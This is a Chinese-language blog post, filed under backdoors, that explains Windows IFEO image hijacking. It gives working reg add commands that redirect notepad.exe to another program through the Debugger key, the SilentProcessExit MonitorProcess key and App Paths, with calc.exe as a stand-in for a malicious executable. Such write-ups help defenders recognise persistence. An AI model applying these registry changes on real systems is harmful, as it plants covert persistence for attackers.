映像劫持的新老玩法

后门
创建时间:
阅读:
  1. image hijack

image hijack

映像劫持(IFEO)

作用:劫持对应的程序后,打开该程序运行的是别的程序,比如运行A.exe打开的则是CALC.exe
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
用法:在注册表路径下创建一个项,项名为要劫持的exe名称,并在该项创建一个Debugger的键值,键值填运行的恶意EXE。或者在已经创建的项里创建Debugger键填入键值,运行那个exe就会被劫持

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v Debugger /t REG_SZ /d C:\Windows\System32\calc.exe

效果图:

映像劫持新玩法:

https://www.anquanke.com/post/id/151425
效果:程序A静默退出结束后,会执行程序B。
注册表路径:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<劫持的exe名称>
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\<劫持的exe名称>

劫持notepad.exe示例:

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" /v notepad.exe /t REG_DWORD /d 512
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /t REG_SZ /d C:\Windows\System32\calc.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1

代替映像劫持的注册表路径

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\<要劫持的exe名>

Defualt键值为要运行的恶意exe路径

转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:映像劫持的新老玩法

本文作者:九世

发布时间:2020-02-23, 21:08:35

最后更新:2020-02-23, 21:22:05

原始链接:http://jiushill.github.io/posts/9a523925.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

©2016-2019 Yelog

Built with Hexo and 3-hexo theme

目录